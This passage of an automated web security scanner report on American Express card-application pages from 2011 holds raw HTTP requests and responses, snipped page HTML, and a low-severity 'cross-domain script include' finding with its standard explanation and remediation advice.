href="http://www.membershiprewards.com/catalog/landing/open/Default.aspx?us_nu=dd&inav=menu_business_openrewards" id="menu_business_openrewards">Rewards & Benefits</a> ...[SNIP]... <br /> <a href="http://www.openforum.com/" id="menu_xsell_openforum" title="">Learn More</a> ...[SNIP]... <li> <a id="footer_MR" title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR">Membership Rewards® Program</a> ...[SNIP]... </a><a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" / ...[SNIP]... </a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /> ...[SNIP]...
GET /getthecard/compare-cards/premium-rewards?btct=AMEX_APPLY_Tile_L_SJ_N1_Bucket_Charge_Generic:Targeted&ct11=AMEX_APPLY_Tile_L_SJ_N1_Bucket_Charge_Generic HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:13:55 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000LBBuFSr8r4U4UH1XvCDpeUK:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 109125
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <scr ...[SNIP]... <li> <a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a> ...[SNIP]... <li> <a title="" href="http://www.americanexpressfhr.com?inav=menu_travel_fhr" id="menu_travel_fhr">Fine Hotels & Resorts</a> ...[SNIP]... <li> <a title="" href="http://www.amextravelresources.com/#/travel-office&us_nu=dd&inav=menu_travel_findoffice" id="menu_travel_findoffice">Find a Travel Service Office </a> ...[SNIP]... <br /> <a href="http://ad.doubleclick.net/clk;224762057;48546474;q?https://axptravel.americanexpress.com/consumertravel/travel.do?intlink=ctn-xs000049" id="menu_xsell_booktravel" title="">Book Now</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=menu_rewards_mrhome" id="menu_rewards_mrhome">Membership Rewards® Home</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/?inav=menu_rewards_usepoints" id="menu_rewards_usepoints">Use Points</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/earn/default.aspx?inav=menu_rewards_earnpoints" id="menu_rewards_earnpoints">Earn Points</a> ...[SNIP]... <li> <a title="" href="http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop&inav=menu_rewards_shopping" id="menu_rewards_shopping">Shopping Discounts</a> ...[SNIP]... <br /> <a href="http://dailywish.amexnetwork.com/default.aspx?cid=dailywish-issuer-inav-prop" id="menu_xsell_dailywish" title="">Go Now</a> ...[SNIP]... <li> <a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/landing/open/Default.aspx?us_nu=dd&inav=menu_business_openrewards" id="menu_business_openrewards">Rewards & Benefits</a> ...[SNIP]... <br /> <a href="http://www.openforum.com/" id="menu_xsell_openforum" title="">Learn More</a> ...[SNIP]... int deduction on your Membership Rewards program account. These points can be retrieved by calling Membership Rewards. Terms and Conditions of the Membership Rewards program apply and are available at <a href="http://www.membershiprewards.com/terms">membershiprewards.com/terms</a> ...[SNIP]... <li> <a id="footer_MR" title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR">Membership Rewards® Program</a> ...[SNIP]... </a><a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" / ...[SNIP]... </a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /> ...[SNIP]...
GET /getthecard/home?sj_tabToOpen=1&inav=menu_cards_pc_choosecard HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:07:47 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742067833498; path=/; expires=Sun, 07-Feb-16 14:07:47 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000otCjlTVaXO5DCzvt3Q83VII:10ue6mmd9;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <script src="htt ...[SNIP]... <li> <a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a> ...[SNIP]... <li> <a title="" href="http://www.americanexpressfhr.com?inav=menu_travel_fhr" id="menu_travel_fhr">Fine Hotels & Resorts</a> ...[SNIP]... <li> <a title="" href="http://www.amextravelresources.com/#/travel-office&us_nu=dd&inav=menu_travel_findoffice" id="menu_travel_findoffice">Find a Travel Service Office </a> ...[SNIP]... <br /> <a href="http://ad.doubleclick.net/clk;224762057;48546474;q?https://axptravel.americanexpress.com/consumertravel/travel.do?intlink=ctn-xs000049" id="menu_xsell_booktravel" title="">Book Now</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=menu_rewards_mrhome" id="menu_rewards_mrhome">Membership Rewards® Home</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/?inav=menu_rewards_usepoints" id="menu_rewards_usepoints">Use Points</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/earn/default.aspx?inav=menu_rewards_earnpoints" id="menu_rewards_earnpoints">Earn Points</a> ...[SNIP]... <li> <a title="" href="http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop&inav=menu_rewards_shopping" id="menu_rewards_shopping">Shopping Discounts</a> ...[SNIP]... <br /> <a href="http://dailywish.amexnetwork.com/default.aspx?cid=dailywish-issuer-inav-prop" id="menu_xsell_dailywish" title="">Go Now</a> ...[SNIP]... <li> <a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/landing/open/Default.aspx?us_nu=dd&inav=menu_business_openrewards" id="menu_business_openrewards">Rewards & Benefits</a> ...[SNIP]... <br /> <a href="http://www.openforum.com/" id="menu_xsell_openforum" title="">Learn More</a> ...[SNIP]... <li> <a id="footer_MR" title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR">Membership Rewards® Program</a> ...[SNIP]... </a><a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" / ...[SNIP]... </a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /> ...[SNIP]... <noscript><iframe src="https://fls.doubleclick.net/activityi;src=1297440;type=singl842;cat=singl618;ord=1;num=0123456789?" width="1" height="1" frameborder="0"></iframe> ...[SNIP]...
GET /getthecard/learn-about/Gold-Delta-Skymiles?btct=AMEX_APPLY_Tile_L_SJ_N1_Bucket_Small_DeltaGoldImag:Targeted&ct11=AMEX_APPLY_Tile_L_SJ_N1_Bucket_Small_DeltaGoldImag HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:14:04 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000lTP-6z4OraEzr8LIZbz-1gL:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 73240
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]... <li> <a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a> ...[SNIP]... <li> <a title="" href="http://www.americanexpressfhr.com?inav=menu_travel_fhr" id="menu_travel_fhr">Fine Hotels & Resorts</a> ...[SNIP]... <li> <a title="" href="http://www.amextravelresources.com/#/travel-office&us_nu=dd&inav=menu_travel_findoffice" id="menu_travel_findoffice">Find a Travel Service Office </a> ...[SNIP]... <br /> <a href="http://ad.doubleclick.net/clk;224762057;48546474;q?https://axptravel.americanexpress.com/consumertravel/travel.do?intlink=ctn-xs000049" id="menu_xsell_booktravel" title="">Book Now</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=menu_rewards_mrhome" id="menu_rewards_mrhome">Membership Rewards® Home</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/?inav=menu_rewards_usepoints" id="menu_rewards_usepoints">Use Points</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/earn/default.aspx?inav=menu_rewards_earnpoints" id="menu_rewards_earnpoints">Earn Points</a> ...[SNIP]... <li> <a title="" href="http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop&inav=menu_rewards_shopping" id="menu_rewards_shopping">Shopping Discounts</a> ...[SNIP]... <br /> <a href="http://dailywish.amexnetwork.com/default.aspx?cid=dailywish-issuer-inav-prop" id="menu_xsell_dailywish" title="">Go Now</a> ...[SNIP]... <li> <a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/landing/open/Default.aspx?us_nu=dd&inav=menu_business_openrewards" id="menu_business_openrewards">Rewards & Benefits</a> ...[SNIP]... <br /> <a href="http://www.openforum.com/" id="menu_xsell_openforum" title="">Learn More</a> ...[SNIP]... <li> <a id="footer_MR" title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR">Membership Rewards® Program</a> ...[SNIP]... </a><a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" / ...[SNIP]... </a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /> ...[SNIP]... <noscript><iframe src="https://fls.doubleclick.net/activityi;src=1297440;type=singl842;cat=singl745;ord=1;num=0123456789?" width="1" height="1" frameborder="0"></iframe> ...[SNIP]... <!-- End of DoubleClick Spotlight Tag: Please do not remove--> <script language="JavaScript"src="https://survey.openvenue.com/cs/20002834/js/int_en46.js"></script> ...[SNIP]...
GET /getthecard/learn-about/Platinum-Card?btct=AMEX_APPLY_Tile_L_SJ_N1_Bucket_platinumFinControl:Targeted&ct11=AMEX_APPLY_Tile_L_SJ_N1_Bucket_platinumFinControl HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:14:01 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000HlOXPTSYVOBr-O2LgHuyurJ:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 78904
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]... <li> <a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a> ...[SNIP]... <li> <a title="" href="http://www.americanexpressfhr.com?inav=menu_travel_fhr" id="menu_travel_fhr">Fine Hotels & Resorts</a> ...[SNIP]... <li> <a title="" href="http://www.amextravelresources.com/#/travel-office&us_nu=dd&inav=menu_travel_findoffice" id="menu_travel_findoffice">Find a Travel Service Office </a> ...[SNIP]... <br /> <a href="http://ad.doubleclick.net/clk;224762057;48546474;q?https://axptravel.americanexpress.com/consumertravel/travel.do?intlink=ctn-xs000049" id="menu_xsell_booktravel" title="">Book Now</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=menu_rewards_mrhome" id="menu_rewards_mrhome">Membership Rewards® Home</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/?inav=menu_rewards_usepoints" id="menu_rewards_usepoints">Use Points</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/earn/default.aspx?inav=menu_rewards_earnpoints" id="menu_rewards_earnpoints">Earn Points</a> ...[SNIP]... <li> <a title="" href="http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop&inav=menu_rewards_shopping" id="menu_rewards_shopping">Shopping Discounts</a> ...[SNIP]... <br /> <a href="http://dailywish.amexnetwork.com/default.aspx?cid=dailywish-issuer-inav-prop" id="menu_xsell_dailywish" title="">Go Now</a> ...[SNIP]... <li> <a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/landing/open/Default.aspx?us_nu=dd&inav=menu_business_openrewards" id="menu_business_openrewards">Rewards & Benefits</a> ...[SNIP]... <br /> <a href="http://www.openforum.com/" id="menu_xsell_openforum" title="">Learn More</a> ...[SNIP]... <li> <a id="footer_MR" title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR">Membership Rewards® Program</a> ...[SNIP]... </a><a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" / ...[SNIP]... </a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /> ...[SNIP]... <noscript><iframe src="https://fls.doubleclick.net/activityi;src=1297440;type=singl842;cat=singl546;ord=1;num=0123456789?" width="1" height="1" frameborder="0"></iframe> ...[SNIP]... <!-- End of DoubleClick Spotlight Tag: Please do not remove--> <script language="JavaScript"src="https://survey.openvenue.com/cs/20002834/js/int_en44.js"></script> ...[SNIP]...
GET /getthecard/quiz?btct=AMEX_APPLY_Main_SJ_N1_Hero_4PaneCardOffers-NewCat:Targeted:5&ct11=AMEX_APPLY_Main_SJ_N1_Hero_4PaneCardOffers-NewCat HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:13:57 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000NcbFSTVkpHo2CDIHHobKA5i:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 39047
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <script src="https ...[SNIP]... <li> <a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a> ...[SNIP]... <li> <a title="" href="http://www.americanexpressfhr.com?inav=menu_travel_fhr" id="menu_travel_fhr">Fine Hotels & Resorts</a> ...[SNIP]... <li> <a title="" href="http://www.amextravelresources.com/#/travel-office&us_nu=dd&inav=menu_travel_findoffice" id="menu_travel_findoffice">Find a Travel Service Office </a> ...[SNIP]... <br /> <a href="http://ad.doubleclick.net/clk;224762057;48546474;q?https://axptravel.americanexpress.com/consumertravel/travel.do?intlink=ctn-xs000049" id="menu_xsell_booktravel" title="">Book Now</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=menu_rewards_mrhome" id="menu_rewards_mrhome">Membership Rewards® Home</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/?inav=menu_rewards_usepoints" id="menu_rewards_usepoints">Use Points</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/earn/default.aspx?inav=menu_rewards_earnpoints" id="menu_rewards_earnpoints">Earn Points</a> ...[SNIP]... <li> <a title="" href="http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop&inav=menu_rewards_shopping" id="menu_rewards_shopping">Shopping Discounts</a> ...[SNIP]... <br /> <a href="http://dailywish.amexnetwork.com/default.aspx?cid=dailywish-issuer-inav-prop" id="menu_xsell_dailywish" title="">Go Now</a> ...[SNIP]... <li> <a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a> ...[SNIP]... <li> <a title="" href="http://www.membershiprewards.com/catalog/landing/open/Default.aspx?us_nu=dd&inav=menu_business_openrewards" id="menu_business_openrewards">Rewards & Benefits</a> ...[SNIP]... <br /> <a href="http://www.openforum.com/" id="menu_xsell_openforum" title="">Learn More</a> ...[SNIP]... <div id="sj_noflash_1"> <a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash">Get Flash</a> ...[SNIP]... <li> <a id="footer_MR" title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR">Membership Rewards® Program</a> ...[SNIP]... </a><a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" / ...[SNIP]... </a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /> ...[SNIP]...
6. Cross-domain script includeprevious There are 5 instances of this issue:
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET /business-credit-cards/business-card-compare/business-travel-rewards-credit-cards/29789 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:00 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742080535588; path=/; expires=Sun, 07-Feb-16 14:08:00 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000ZpAlPxhT_5TrUuiUZ9de2FR:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 199837
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
GET /business-credit-cards/business-card-compare/popular-business-charge-credit-cards/29789?inav=menu_cards_sbc_comparecards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:14:24 GMT Server: IBM_HTTP_Server Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 181773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The response dynamically includes the following script from another domain:
http://static.atgsvcs.com/js/atgsvcs.js
Request
GET /business-credit-cards/business-solutions/overview HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:09 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742089169187; path=/; expires=Sun, 07-Feb-16 14:08:09 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=00001tp4Y9HDwnJc950b6Ajopjw:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 40955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
GET /getthecard/learn-about/Gold-Delta-Skymiles?btct=AMEX_APPLY_Tile_L_SJ_N1_Bucket_Small_DeltaGoldImag:Targeted&ct11=AMEX_APPLY_Tile_L_SJ_N1_Bucket_Small_DeltaGoldImag HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:14:04 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000lTP-6z4OraEzr8LIZbz-1gL:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 73240
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]... <!-- End of DoubleClick Spotlight Tag: Please do not remove--> <script language="JavaScript"src="https://survey.openvenue.com/cs/20002834/js/int_en46.js"></script> ...[SNIP]...
GET /getthecard/learn-about/Platinum-Card HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:14:00 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000AFOMkS-ScxKAuTxEZnyZ28u:10ue6mmd9;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 78382
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]... <!-- End of DoubleClick Spotlight Tag: Please do not remove--> <script language="JavaScript"src="https://survey.openvenue.com/cs/20002834/js/int_en44.js"></script> ...[SNIP]...